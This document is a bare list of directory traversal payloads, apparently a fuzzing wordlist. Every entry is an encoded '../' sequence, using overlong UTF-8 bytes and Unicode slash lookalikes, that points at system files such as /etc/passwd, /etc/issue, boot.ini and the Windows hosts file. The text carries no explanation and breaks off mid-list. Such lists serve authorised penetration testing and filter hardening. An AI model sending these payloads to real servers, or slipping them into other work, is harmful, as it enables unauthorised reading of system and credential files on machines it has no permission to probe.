-%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%afetc%c1%afissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%afboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%afetc%c1%afpasswd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%afetc%c1%afissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%afboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%afetc%c1%afpasswd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%afetc%c1%afissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%afboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%bg%qfetc%bg%qfpasswd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%bg%qfetc%bg%qfissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%bg%qfboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%bg%qf%fc%80%80%80%80%ae%fc%80%80%80%80%ae%bg%qfetc%bg%qfpasswd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%bg%qf%fc%80%80%80%80%ae%fc%80%80%80%80%ae%bg%qfetc%bg%qfissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%bg%qf%fc%80%80%80%80%ae%fc%80%80%80%80%ae%bg%qfboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%bg%qf%fc%80%80%80%80%ae%fc%80%80%80%80%ae%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%bg%qf%fc%80%80%80%80%ae%fc%80%80%80%80%ae%bg%qf%fc%80%80%80%80%ae%fc%80%80%80%80%ae%bg%qfetc%bg%qfpasswd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%bg%qf%fc%80%80%80%80%ae%fc%80%80%80%80%ae%bg%qf%fc%80%80%80%80%ae%fc%80%80%80%80%ae%bg%qfetc%bg%qfissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%bg%qf%fc%80%80%80%80%ae%fc%80%80%80%80%ae%bg%qf%fc%80%80%80%80%ae%fc%80%80%80%80%ae%bg%qfboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%bg%qf%fc%80%80%80%80%ae%fc%80%80%80%80%ae%bg%qf%fc%80%80%80%80%ae%fc%80%80%80%80%ae%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%bg%qf%fc%80%80%80%80%ae%fc%80%80%80%80%ae%bg%qf%fc%80%80%80%80%ae%fc%80%80%80%80%ae%bg%qf%fc%80%80%80%80%ae%fc%80%80%80%80%ae%bg%qfetc%bg%qfpasswd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%bg%qf%fc%80%80%80%80%ae%fc%80%80%80%80%ae%bg%qf%fc%80%80%80%80%ae%fc%80%80%80%80%ae%bg%qf%fc%80%80%80%80%ae%fc%80%80%80%80%ae%bg%qfetc%bg%qfissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%bg%qf%fc%80%80%80%80%ae%fc%80%80%80%80%ae%bg%qf%fc%80%80%80%80%ae%fc%80%80%80%80%ae%bg%qf%fc%80%80%80%80%ae%fc%80%80%80%80%ae%bg%qfboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%bg%qf%fc%80%80%80%80%ae%fc%80%80%80%80%ae%bg%qf%fc%80%80%80%80%ae%fc%80%80%80%80%ae%bg%qf%fc%80%80%80%80%ae%fc%80%80%80%80%ae%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%bg%qf%fc%80%80%80%80%ae%fc%80%80%80%80%ae%bg%qf%fc%80%80%80%80%ae%fc%80%80%80%80%ae%bg%qf%fc%80%80%80%80%ae%fc%80%80%80%80%ae%bg%qf%fc%80%80%80%80%ae%fc%80%80%80%80%ae%bg%qfetc%bg%qfpasswd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%bg%qf%fc%80%80%80%80%ae%fc%80%80%80%80%ae%bg%qf%fc%80%80%80%80%ae%fc%80%80%80%80%ae%bg%qf%fc%80%80%80%80%ae%fc%80%80%80%80%ae%bg%qf%fc%80%80%80%80%ae%fc%80%80%80%80%ae%bg%qfetc%bg%qfissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%bg%qf%fc%80%80%80%80%ae%fc%80%80%80%80%ae%bg%qf%fc%80%80%80%80%ae%fc%80%80%80%80%ae%bg%qf%fc%80%80%80%80%ae%fc%80%80%80%80%ae%bg%qf%fc%80%80%80%80%ae%fc%80%80%80%80%ae%bg%qfboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%bg%qf%fc%80%80%80%80%ae%fc%80%80%80%80%ae%bg%qf%fc%80%80%80%80%ae%fc%80%80%80%80%ae%bg%qf%fc%80%80%80%80%ae%fc%80%80%80%80%ae%bg%qf%fc%80%80%80%80%ae%fc%80%80%80%80%ae%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%bg%qf%fc%80%80%80%80%ae%fc%80%80%80%80%ae%bg%qf%fc%80%80%80%80%ae%fc%80%80%80%80%ae%bg%qf%fc%80%80%80%80%ae%fc%80%80%80%80%ae%bg%qf%fc%80%80%80%80%ae%fc%80%80%80%80%ae%bg%qf%fc%80%80%80%80%ae%fc%80%80%80%80%ae%bg%qfetc%bg%qfpasswd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%bg%qf%fc%80%80%80%80%ae%fc%80%80%80%80%ae%bg%qf%fc%80%80%80%80%ae%fc%80%80%80%80%ae%bg%qf%fc%80%80%80%80%ae%fc%80%80%80%80%ae%bg%qf%fc%80%80%80%80%ae%fc%80%80%80%80%ae%bg%qf%fc%80%80%80%80%ae%fc%80%80%80%80%ae%bg%qfetc%bg%qfissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%bg%qf%fc%80%80%80%80%ae%fc%80%80%80%80%ae%bg%qf%fc%80%80%80%80%ae%fc%80%80%80%80%ae%bg%qf%fc%80%80%80%80%ae%fc%80%80%80%80%ae%bg%qf%fc%80%80%80%80%ae%fc%80%80%80%80%ae%bg%qf%fc%80%80%80%80%ae%fc%80%80%80%80%ae%bg%qfboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%bg%qf%fc%80%80%80%80%ae%fc%80%80%80%80%ae%bg%qf%fc%80%80%80%80%ae%fc%80%80%80%80%ae%bg%qf%fc%80%80%80%80%ae%fc%80%80%80%80%ae%bg%qf%fc%80%80%80%80%ae%fc%80%80%80%80%ae%bg%qf%fc%80%80%80%80%ae%fc%80%80%80%80%ae%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2215etc%u2215passwd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2215etc%u2215issue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2215boot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2215%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2215etc%u2215passwd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2215%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2215etc%u2215issue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2215%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2215boot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2215%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2215%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2215%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2215etc%u2215passwd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2215%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2215%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2215etc%u2215issue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2215%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2215%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2215boot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2215%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2215%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2215%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2215%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2215%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2215etc%u2215passwd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2215%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2215%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2215%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2215etc%u2215issue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2215%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2215%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2215%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2215boot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2215%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2215%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2215%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2215%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2215%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2215%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2215%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2215etc%u2215passwd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2215%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2215%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2215%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2215%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2215etc%u2215issue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2215%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2215%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2215%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2215%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2215boot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2215%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2215%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2215%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2215%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2215%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2215%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2215%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2215%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2215%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2215etc%u2215passwd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2215%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2215%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2215%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2215%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2215%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2215etc%u2215issue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2215%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2215%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2215%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2215%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2215%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2215boot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2215%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2215%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2215%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2215%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2215%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2216etc%u2216passwd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2216etc%u2216issue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2216boot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2216%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2216etc%u2216passwd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2216%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2216etc%u2216issue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2216%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2216boot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2216%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2216%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2216%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2216etc%u2216passwd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2216%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2216%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2216etc%u2216issue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2216%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2216%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2216boot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2216%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2216%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2216%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2216%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2216%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2216etc%u2216passwd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2216%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2216%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2216%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2216etc%u2216issue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2216%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2216%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2216%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2216boot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2216%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2216%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2216%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2216%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2216%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2216%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2216%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2216etc%u2216passwd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2216%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2216%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2216%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2216%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2216etc%u2216issue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2216%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2216%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2216%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2216%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2216boot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2216%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2216%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2216%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2216%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2216%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2216%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2216%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2216%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2216%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2216etc%u2216passwd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2216%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2216%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2216%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2216%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2216%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2216etc%u2216issue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2216%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2216%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2216%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2216%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2216%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2216boot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2216%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2216%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2216%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2216%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2216%fc%80%80%80%80%ae%fc%80%80%80%80%ae%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uEFC8etc%uEFC8passwd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uEFC8etc%uEFC8issue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uEFC8boot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uEFC8%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uEFC8etc%uEFC8passwd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uEFC8%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uEFC8etc%uEFC8issue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uEFC8%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uEFC8boot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uEFC8%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uEFC8%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uEFC8%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uEFC8etc%uEFC8passwd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uEFC8%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uEFC8%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uEFC8etc%uEFC8issue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uEFC8%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uEFC8%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uEFC8boot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uEFC8%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uEFC8%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uEFC8%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uEFC8%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uEFC8%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uEFC8etc%uEFC8passwd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uEFC8%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uEFC8%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uEFC8%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uEFC8etc%uEFC8issue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uEFC8%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uEFC8%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uEFC8%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uEFC8boot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uEFC8%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uEFC8%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uEFC8%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uEFC8%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uEFC8%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uEFC8%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uEFC8%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uEFC8etc%uEFC8passwd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uEFC8%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uEFC8%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uEFC8%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uEFC8%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uEFC8etc%uEFC8issue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uEFC8%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uEFC8%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uEFC8%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uEFC8%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uEFC8boot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uEFC8%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uEFC8%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uEFC8%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uEFC8%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uEFC8%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uEFC8%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uEFC8%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uEFC8%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uEFC8%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uEFC8etc%uEFC8passwd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uEFC8%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uEFC8%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uEFC8%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uEFC8%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uEFC8%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uEFC8etc%uEFC8issue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uEFC8%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uEFC8%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uEFC8%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uEFC8%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uEFC8%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uEFC8boot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uEFC8%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uEFC8%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uEFC8%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uEFC8%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uEFC8%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uF025etc%uF025passwd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uF025etc%uF025issue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uF025boot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uF025%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uF025etc%uF025passwd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uF025%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uF025etc%uF025issue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uF025%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uF025boot.ini 